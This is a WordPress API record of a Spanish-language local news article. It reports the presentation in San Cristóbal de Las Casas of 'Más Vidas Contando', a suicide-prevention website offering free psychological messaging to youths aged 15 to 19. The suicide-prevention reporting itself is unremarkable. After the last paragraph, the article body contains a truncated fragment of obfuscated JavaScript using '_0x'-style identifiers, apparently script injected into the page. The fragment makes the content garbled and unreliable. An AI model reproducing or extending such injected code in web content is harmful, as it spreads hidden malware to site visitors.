{"id":11712,"date":"2023-09-07T04:28:03","date_gmt":"2023-09-07T04:28:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11712"},"modified":"2023-09-07T04:28:03","modified_gmt":"2023-09-07T04:28:03","slug":"presentan-proyecto-mas-vidas-contando-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11712","title":{"rendered":"Presentan proyecto &#8220;M\u00e1s Vidas Contando&#8221; en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-06-at-2.28.41-PM-1024x771.jpeg\" alt=\"\" class=\"wp-image-11713\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-06-at-2.28.41-PM-1024x771.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-06-at-2.28.41-PM-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-06-at-2.28.41-PM-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-06-at-2.28.41-PM-1536x1156.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-06-at-2.28.41-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas-. En el marco del D\u00eda Mundial de la Prevenci\u00f3n del Suicidio que es el 10 de septiembre, el pr\u00f3ximo viernes 8 de septiembre  se presentar\u00e1 ante medios de comunicaci\u00f3n el proyecto &#8220;M\u00e1s Vidas Contando&#8221;, que es una p\u00e1gina web que promueve la prevenci\u00f3n del suicidio, pero adem\u00e1s su atenci\u00f3n cl\u00ednica de forma directa, dio a conocer Sara Rosales, de la organizaci\u00f3n Kybernus, A.C.&#8221;Vamos hacer la presentaci\u00f3n del proyecto que es a nivel nacional, que se llama M\u00e1s Vidas Contando, es una p\u00e1gina web donde podemos encontrar servicios de psicolog\u00eda y para la prevenci\u00f3n del suicidio, vamos a presentarlo ante la prensa que son nuestros aliados, estamos invitando a periodistas, que se dediquen a la comunicaci\u00f3n para que le den difusi\u00f3n a nuestra p\u00e1gina donde hay una mensajer\u00eda gratuita para abordar estos casos cl\u00ednicos&#8221;, coment\u00f3  en entrevista.Y es que dijo muchas veces las instituciones trabajan en la prevenci\u00f3n pero muy pocos trabajan la Intervenci\u00f3n directa de un suicidio. &#8220;Este es un proyecto que nace en Chiapas, pero tambi\u00e9n en Aguascalientes all\u00e1 est\u00e1 nuestra compa\u00f1era Mayra Quiroz, ella es una persona que ha estudiado mucho est\u00e1 formaci\u00f3n de la ciencia, la ingenier\u00eda, las artes y las matem\u00e1ticas&#8221;.&#8221;En conjunto con Kibernus formamos la p\u00e1gina entonces, ella lleva la p\u00e1gina y yo los casos cl\u00ednicos, estamos haciendo agrupaciones como formando una red en toda la Rep\u00fablica, y despu\u00e9s de la presentaci\u00f3n vamos proyectar un cortometraje que trata del suicidio en Municipios de Los Altos de Chiapas, como Larra\u00ednzar&#8221;, agreg\u00f3.Finalmente, explic\u00f3 que los factores que detonan el suicidio se encuentra la p\u00e9rdida de trabajo, de una pareja, de un familiar y muchas otras cosas que pueden impactar en la persona, &#8220;hay una palabra que significa resiliencia algunas personas no tienen resiliencia a cosas tan traum\u00e1ticas como no tener dinero, entonces ese es el trabajo de M\u00e1s Vidas Contando no solamente impactar a nivel individual y apoyar a los j\u00f3venes, porque va dirigido a ellos de entre 15 y 19 a\u00f1os que son los que tienen m\u00e1s incidencia en intentos de suicidio&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas-. En el marco del D\u00eda Mundial de la Prevenci\u00f3n del Suicidio que es el 10 de septiembre, el pr\u00f3ximo viernes 8 de septiembre se presentar\u00e1 ante medios de comunicaci\u00f3n el proyecto &#8220;M\u00e1s Vidas Contando&#8221;, que es una p\u00e1gina web que promueve la prevenci\u00f3n del suicidio, pero adem\u00e1s su &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11713,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11712","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11712","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11712"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11712\/revisions"}],"predecessor-version":[{"id":11714,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11712\/revisions\/11714"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11713"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11712"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11712"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11712"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}